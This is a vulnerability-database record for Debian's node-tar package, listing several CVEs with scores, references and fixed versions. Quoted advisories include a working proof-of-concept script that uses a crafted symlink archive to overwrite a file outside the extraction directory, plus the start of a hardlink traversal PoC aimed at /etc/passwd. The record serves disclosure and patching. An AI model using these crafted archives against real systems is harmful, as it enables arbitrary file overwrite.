Lookup for vulnerable packages by Package URL.

Purlpkg:deb/debian/node-tar@0?distro=trixie
Typedeb
Namespacedebian
Namenode-tar
Version0
Qualifiers
distro trixie
Subpath
Is_vulnerablefalse
Next_non_vulnerable_version2.2.1-1
Latest_non_vulnerable_version6.2.1+ds1+~cs6.1.13-10
Affected_by_vulnerabilities
Fixing_vulnerabilities
0
url VCID-3ctc-sy35-yba5
vulnerability_id VCID-3ctc-sy35-yba5
summary
node-tar has a race condition leading to uninitialized memory exposure
Using `.t` (aka `.list`) with `{ sync: true }` to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-64118.json
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-64118.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-64118
reference_id
reference_type
scores
0
value 3e-05
scoring_system epss
scoring_elements 0.00134
published_at 2026-04-08T12:55:00Z
1
value 4e-05
scoring_system epss
scoring_elements 0.00196
published_at 2026-04-29T12:55:00Z
2
value 4e-05
scoring_system epss
scoring_elements 0.0019
published_at 2026-04-09T12:55:00Z
3
value 4e-05
scoring_system epss
scoring_elements 0.00192
published_at 2026-04-13T12:55:00Z
4
value 4e-05
scoring_system epss
scoring_elements 0.00194
published_at 2026-04-18T12:55:00Z
5
value 4e-05
scoring_system epss
scoring_elements 0.00198
published_at 2026-04-26T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-64118
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/isaacs/node-tar
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/isaacs/node-tar
4
reference_url https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-30T18:41:54Z/
url https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d
5
reference_url https://github.com/isaacs/node-tar/commit/5e1a8e638600d3c3a2969b4de6a6ec44fa8d74c9
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/isaacs/node-tar/commit/5e1a8e638600d3c3a2969b4de6a6ec44fa8d74c9
6
reference_url https://github.com/isaacs/node-tar/issues/445
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-30T18:41:54Z/
url https://github.com/isaacs/node-tar/issues/445
7
reference_url https://github.com/isaacs/node-tar/pull/446
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-30T18:41:54Z/
url https://github.com/isaacs/node-tar/pull/446
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2407440
reference_id 2407440
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2407440
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-64118
reference_id CVE-2025-64118
reference_type
scores
0
value 6.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-64118
10
reference_url https://github.com/advisories/GHSA-29xp-372q-xqph
reference_id GHSA-29xp-372q-xqph
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-29xp-372q-xqph
11
reference_url https://github.com/isaacs/node-tar/security/advisories/GHSA-29xp-372q-xqph
reference_id GHSA-29xp-372q-xqph
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
1
value 6.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-30T18:41:54Z/
url https://github.com/isaacs/node-tar/security/advisories/GHSA-29xp-372q-xqph
fixed_packages
0
url pkg:deb/debian/node-tar@0?distro=trixie
purl pkg:deb/debian/node-tar@0?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@0%3Fdistro=trixie
1
url pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u2?distro=trixie
purl pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u2?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5wr3-7131-u3aa
1
vulnerability VCID-bj4b-gq5e-2kfy
2
vulnerability VCID-fqmy-jhdk-xfhw
3
vulnerability VCID-jj22-rfbv-bkg3
4
vulnerability VCID-qunt-xms1-a3cc
5
vulnerability VCID-xqpk-t1d2-yqak
6
vulnerability VCID-yy79-dbn9-7bd5
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.0.5%252Bds1%252B~cs11.3.9-1%252Bdeb11u2%3Fdistro=trixie
2
url pkg:deb/debian/node-tar@6.1.13%2B~cs7.0.5-1?distro=trixie
purl pkg:deb/debian/node-tar@6.1.13%2B~cs7.0.5-1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5wr3-7131-u3aa
1
vulnerability VCID-bj4b-gq5e-2kfy
2
vulnerability VCID-fqmy-jhdk-xfhw
3
vulnerability VCID-jj22-rfbv-bkg3
4
vulnerability VCID-yy79-dbn9-7bd5
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.1.13%252B~cs7.0.5-1%3Fdistro=trixie
3
url pkg:deb/debian/node-tar@6.2.1%2B~cs7.0.8-1?distro=trixie
purl pkg:deb/debian/node-tar@6.2.1%2B~cs7.0.8-1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5wr3-7131-u3aa
1
vulnerability VCID-bj4b-gq5e-2kfy
2
vulnerability VCID-jj22-rfbv-bkg3
3
vulnerability VCID-yy79-dbn9-7bd5
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.2.1%252B~cs7.0.8-1%3Fdistro=trixie
4
url pkg:deb/debian/node-tar@6.2.1%2Bds1%2B~cs6.1.13-10?distro=trixie
purl pkg:deb/debian/node-tar@6.2.1%2Bds1%2B~cs6.1.13-10?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.2.1%252Bds1%252B~cs6.1.13-10%3Fdistro=trixie
aliases CVE-2025-64118, GHSA-29xp-372q-xqph
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3ctc-sy35-yba5
1
url VCID-m4hj-dq8q-67f6
vulnerability_id VCID-m4hj-dq8q-67f6
summary
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The npm package "tar" (aka node-tar) has an arbitrary file creation/overwrite and arbitrary code execution vulnerability. node-tar aims to guarantee that any file whose location would be outside of the extraction target directory is not extracted.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-37713.json
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-37713.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-37713
reference_id
reference_type
scores
0
value 0.00316
scoring_system epss
scoring_elements 0.54636
published_at 2026-04-29T12:55:00Z
1
value 0.00316
scoring_system epss
scoring_elements 0.54563
published_at 2026-04-01T12:55:00Z
2
value 0.00316
scoring_system epss
scoring_elements 0.54633
published_at 2026-04-02T12:55:00Z
3
value 0.00316
scoring_system epss
scoring_elements 0.54656
published_at 2026-04-04T12:55:00Z
4
value 0.00316
scoring_system epss
scoring_elements 0.54626
published_at 2026-04-07T12:55:00Z
5
value 0.00316
scoring_system epss
scoring_elements 0.54678
published_at 2026-04-08T12:55:00Z
6
value 0.00316
scoring_system epss
scoring_elements 0.54674
published_at 2026-04-09T12:55:00Z
7
value 0.00316
scoring_system epss
scoring_elements 0.54687
published_at 2026-04-16T12:55:00Z
8
value 0.00316
scoring_system epss
scoring_elements 0.54671
published_at 2026-04-12T12:55:00Z
9
value 0.00316
scoring_system epss
scoring_elements 0.54649
published_at 2026-04-13T12:55:00Z
10
value 0.00316
scoring_system epss
scoring_elements 0.54689
published_at 2026-04-18T12:55:00Z
11
value 0.00316
scoring_system epss
scoring_elements 0.54668
published_at 2026-04-21T12:55:00Z
12
value 0.00316
scoring_system epss
scoring_elements 0.54639
published_at 2026-04-24T12:55:00Z
13
value 0.00316
scoring_system epss
scoring_elements 0.54657
published_at 2026-04-26T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-37713
2
reference_url https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/isaacs/node-tar/commit/52b09e309bcae0c741a7eb79a17ef36e7828b946
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/isaacs/node-tar/commit/52b09e309bcae0c741a7eb79a17ef36e7828b946
5
reference_url https://github.com/isaacs/node-tar/commit/82eac952f7c10765969ed464e549375854b26edc
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/isaacs/node-tar/commit/82eac952f7c10765969ed464e549375854b26edc
6
reference_url https://github.com/isaacs/node-tar/commit/875a37e3ec031186fc6599f6807341f56c584598
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/isaacs/node-tar/commit/875a37e3ec031186fc6599f6807341f56c584598
7
reference_url https://github.com/npm/node-tar
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/npm/node-tar
8
reference_url https://www.npmjs.com/package/tar
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.npmjs.com/package/tar
9
reference_url https://www.oracle.com/security-alerts/cpuoct2021.html
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2021.html
10
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2033394
reference_id 2033394
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2033394
11
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-37713
reference_id CVE-2021-37713
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-37713
12
reference_url https://github.com/advisories/GHSA-5955-9wpr-37jh
reference_id GHSA-5955-9wpr-37jh
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5955-9wpr-37jh
13
reference_url https://github.com/npm/node-tar/security/advisories/GHSA-5955-9wpr-37jh
reference_id GHSA-5955-9wpr-37jh
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/npm/node-tar/security/advisories/GHSA-5955-9wpr-37jh
fixed_packages
0
url pkg:deb/debian/node-tar@0?distro=trixie
purl pkg:deb/debian/node-tar@0?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@0%3Fdistro=trixie
1
url pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u2?distro=trixie
purl pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u2?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5wr3-7131-u3aa
1
vulnerability VCID-bj4b-gq5e-2kfy
2
vulnerability VCID-fqmy-jhdk-xfhw
3
vulnerability VCID-jj22-rfbv-bkg3
4
vulnerability VCID-qunt-xms1-a3cc
5
vulnerability VCID-xqpk-t1d2-yqak
6
vulnerability VCID-yy79-dbn9-7bd5
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.0.5%252Bds1%252B~cs11.3.9-1%252Bdeb11u2%3Fdistro=trixie
2
url pkg:deb/debian/node-tar@6.1.13%2B~cs7.0.5-1?distro=trixie
purl pkg:deb/debian/node-tar@6.1.13%2B~cs7.0.5-1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5wr3-7131-u3aa
1
vulnerability VCID-bj4b-gq5e-2kfy
2
vulnerability VCID-fqmy-jhdk-xfhw
3
vulnerability VCID-jj22-rfbv-bkg3
4
vulnerability VCID-yy79-dbn9-7bd5
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.1.13%252B~cs7.0.5-1%3Fdistro=trixie
3
url pkg:deb/debian/node-tar@6.2.1%2B~cs7.0.8-1?distro=trixie
purl pkg:deb/debian/node-tar@6.2.1%2B~cs7.0.8-1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5wr3-7131-u3aa
1
vulnerability VCID-bj4b-gq5e-2kfy
2
vulnerability VCID-jj22-rfbv-bkg3
3
vulnerability VCID-yy79-dbn9-7bd5
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.2.1%252B~cs7.0.8-1%3Fdistro=trixie
4
url pkg:deb/debian/node-tar@6.2.1%2Bds1%2B~cs6.1.13-10?distro=trixie
purl pkg:deb/debian/node-tar@6.2.1%2Bds1%2B~cs6.1.13-10?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.2.1%252Bds1%252B~cs6.1.13-10%3Fdistro=trixie
aliases CVE-2021-37713, GHSA-5955-9wpr-37jh
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-m4hj-dq8q-67f6
2
url VCID-qunt-xms1-a3cc
vulnerability_id VCID-qunt-xms1-a3cc
summary
node-tar Symlink Path Traversal via Drive-Relative Linkpath
### Summary
`tar` (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as `C:../../../target.txt`, which enables file overwrite outside `cwd` during normal `tar.x()` extraction.

### Details
The extraction logic in `Unpack[STRIPABSOLUTEPATH]` validates `..` segments against a resolved path that still uses the original drive-relative value, and only afterwards rewrites the stored `linkpath` to the stripped value.

What happens with `linkpath: "C:../../../target.txt"`:
1. `stripAbsolutePath()` removes `C:` and rewrites the value to `../../../target.txt`.
2. The escape check resolves using the original pre-stripped value, so it is treated as in-bounds and accepted.
3. Symlink creation uses the rewritten value (`../../../target.txt`) from nested path `a/b/l`.
4. Writing through the extracted symlink overwrites the outside file (`../target.txt`).

This is reachable in standard usage (`tar.x({ cwd, file })`) when extracting attacker-controlled tar archives.

### PoC
Tested on Arch Linux with `tar@7.5.10`.

PoC script (`poc.cjs`):

```js
const fs = require('fs')
const path = require('path')
const { Header, x } = require('tar')

const cwd = process.cwd()
const target = path.resolve(cwd, '..', 'target.txt')
const tarFile = path.join(cwd, 'poc.tar')

fs.writeFileSync(target, 'ORIGINAL\n')

const b = Buffer.alloc(1536)
new Header({
  path: 'a/b/l',
  type: 'SymbolicLink',
  linkpath: 'C:../../../target.txt',
}).encode(b, 0)
fs.writeFileSync(tarFile, b)

x({ cwd, file: tarFile }).then(() => {
  fs.writeFileSync(path.join(cwd, 'a/b/l'), 'PWNED\n')
  process.stdout.write(fs.readFileSync(target, 'utf8'))
})
```

Run:

```bash
node poc.cjs && readlink a/b/l && ls -l a/b/l ../target.txt
```

Observed output:

```text
PWNED
../../../target.txt
lrwxrwxrwx - joshuavr  7 Mar 18:37 󰡯 a/b/l -> ../../../target.txt
.rw-r--r-- 6 joshuavr  7 Mar 18:37  ../target.txt
```

`PWNED` confirms outside file content overwrite. `readlink` and `ls -l` confirm the extracted symlink points outside the extraction directory.

### Impact
This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.

Realistic scenarios:
- CLI tools unpacking untrusted tarballs into a working directory
- build/update pipelines consuming third-party archives
- services that import user-supplied tar files
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31802.json
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31802.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-31802
reference_id
reference_type
scores
0
value 7e-05
scoring_system epss
scoring_elements 0.00472
published_at 2026-04-07T12:55:00Z
1
value 7e-05
scoring_system epss
scoring_elements 0.00481
published_at 2026-04-02T12:55:00Z
2
value 7e-05
scoring_system epss
scoring_elements 0.00467
published_at 2026-04-09T12:55:00Z
3
value 7e-05
scoring_system epss
scoring_elements 0.00477
published_at 2026-04-04T12:55:00Z
4
value 7e-05
scoring_system epss
scoring_elements 0.0047
published_at 2026-04-08T12:55:00Z
5
value 8e-05
scoring_system epss
scoring_elements 0.00658
published_at 2026-04-16T12:55:00Z
6
value 8e-05
scoring_system epss
scoring_elements 0.00663
published_at 2026-04-18T12:55:00Z
7
value 8e-05
scoring_system epss
scoring_elements 0.00665
published_at 2026-04-13T12:55:00Z
8
value 8e-05
scoring_system epss
scoring_elements 0.00706
published_at 2026-04-29T12:55:00Z
9
value 8e-05
scoring_system epss
scoring_elements 0.00664
published_at 2026-04-12T12:55:00Z
10
value 8e-05
scoring_system epss
scoring_elements 0.00671
published_at 2026-04-11T12:55:00Z
11
value 8e-05
scoring_system epss
scoring_elements 0.00707
published_at 2026-04-26T12:55:00Z
12
value 8e-05
scoring_system epss
scoring_elements 0.00705
published_at 2026-04-24T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-31802
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-31802
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-31802
3
reference_url https://github.com/isaacs/node-tar
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/isaacs/node-tar
4
reference_url https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:56:31Z/
url https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad
5
reference_url https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256
reference_id
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:56:31Z/
url https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-31802
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-31802
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445881
reference_id 2445881
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445881
8
reference_url https://github.com/advisories/GHSA-9ppj-qmqm-q256
reference_id GHSA-9ppj-qmqm-q256
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-9ppj-qmqm-q256
fixed_packages
0
url pkg:deb/debian/node-tar@0?distro=trixie
purl pkg:deb/debian/node-tar@0?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@0%3Fdistro=trixie
1
url pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u2?distro=trixie
purl pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u2?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5wr3-7131-u3aa
1
vulnerability VCID-bj4b-gq5e-2kfy
2
vulnerability VCID-fqmy-jhdk-xfhw
3
vulnerability VCID-jj22-rfbv-bkg3
4
vulnerability VCID-qunt-xms1-a3cc
5
vulnerability VCID-xqpk-t1d2-yqak
6
vulnerability VCID-yy79-dbn9-7bd5
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.0.5%252Bds1%252B~cs11.3.9-1%252Bdeb11u2%3Fdistro=trixie
2
url pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u3?distro=trixie
purl pkg:deb/debian/node-tar@6.0.5%2Bds1%2B~cs11.3.9-1%2Bdeb11u3?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.0.5%252Bds1%252B~cs11.3.9-1%252Bdeb11u3%3Fdistro=trixie
3
url pkg:deb/debian/node-tar@6.1.13%2B~cs7.0.5-1?distro=trixie
purl pkg:deb/debian/node-tar@6.1.13%2B~cs7.0.5-1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5wr3-7131-u3aa
1
vulnerability VCID-bj4b-gq5e-2kfy
2
vulnerability VCID-fqmy-jhdk-xfhw
3
vulnerability VCID-jj22-rfbv-bkg3
4
vulnerability VCID-yy79-dbn9-7bd5
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.1.13%252B~cs7.0.5-1%3Fdistro=trixie
4
url pkg:deb/debian/node-tar@6.2.1%2B~cs7.0.8-1?distro=trixie
purl pkg:deb/debian/node-tar@6.2.1%2B~cs7.0.8-1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5wr3-7131-u3aa
1
vulnerability VCID-bj4b-gq5e-2kfy
2
vulnerability VCID-jj22-rfbv-bkg3
3
vulnerability VCID-yy79-dbn9-7bd5
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.2.1%252B~cs7.0.8-1%3Fdistro=trixie
5
url pkg:deb/debian/node-tar@6.2.1%2Bds1%2B~cs6.1.13-10?distro=trixie
purl pkg:deb/debian/node-tar@6.2.1%2Bds1%2B~cs6.1.13-10?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-tar@6.2.1%252Bds1%252B~cs6.1.13-10%3Fdistro=trixie
aliases CVE-2026-31802, GHSA-9ppj-qmqm-q256
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qunt-xms1-a3cc
3
url VCID-xqpk-t1d2-yqak
vulnerability_id VCID-xqpk-t1d2-yqak
summary
node-tar Vulnerable to Arbitrary File Creation/Overwrite via Hardlink Path Traversal
### Summary
node-tar contains a vulnerability where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory.

### Details
The vulnerability exists in `lib/unpack.js`. When extracting a hardlink, two functions handle the linkpath differently:

**Security check in `[STRIPABSOLUTEPATH]`:**
```javascript
const entryDir = path.posix.dirname(entry.path);
const resolved = path.posix.normalize(path.posix.join(entryDir, linkpath));
if (resolved.startsWith('../')) { /* block */ }
```

**Hardlink creation in `[HARDLINK]`:**
```javascript
const linkpath = path.resolve(this.cwd, entry.linkpath);
fs.linkSync(linkpath, dest);
```

**Example:** An application extracts a TAR using `tar.extract({ cwd: '/var/app/uploads/' })`. The TAR contains entry `a/b/c/d/x` as a hardlink to `../../../../etc/passwd`.

- **Security check** resolves the linkpath relative to the entry's parent directory: `a/b/c/d/ + ../../../../etc/passwd` = `etc/passwd`. No `../` prefix, so it **passes**.

- **Hardlink creation** resolves the linkpath relative to the extraction directory (`this.cwd`): `/var/app/uploads/ + ../../../../etc/passwd` = `/etc/passwd`. This **escapes** to the system's `/etc/passwd`.

The security check and hardlink creation use different starting points (entry directory `a/b/c/d/` vs extraction directory `/var/app/uploads/`), so the same linkpath can pass validation but still escape. The deeper the entry path, the more levels an attacker can escape.

### PoC
#### Setup

Create a new directory with these files:

```
poc/
├── package.json
├── secret.txt          ← sensitive file (target)
├── server.js           ← vulnerable server
├── create-malicious-tar.js
├── verify.js
└── uploads/            ← created automatically by server.js
    └── (extracted files go here)
```

**package.json**
```json
{ "dependencies": { "tar": "^7.5.0" } }
```

**secret.txt** (sensitive file outside uploads/)
```
DATABASE_PASSWORD=supersecret123
```

**server.js** (vulnerable file upload server)
```javascript
const http = require('http');
const fs = require('fs');
const path = require('path');
const tar = require('tar');

const PORT = 3000;
const UPLOAD_DIR = path.join(__dirname, 'uploads');
fs.mkdirSync(UPLOAD_DIR, { recursive: true });

http.createServer((req, res) => {
  if (req.method === 'POST' && req.url === '/upload') {
    const chunks = [];
    req.on('data', c => chunks.push(c));
    req.on('end', async () => {
